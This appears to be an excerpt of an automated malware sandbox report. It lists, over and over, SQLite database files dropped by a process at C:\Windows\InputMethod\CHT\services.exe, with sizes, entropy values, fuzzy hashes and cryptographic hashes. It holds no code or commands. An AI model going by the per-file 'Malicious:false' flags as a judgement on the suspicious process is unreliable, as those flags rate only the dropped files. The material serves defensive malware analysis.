                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
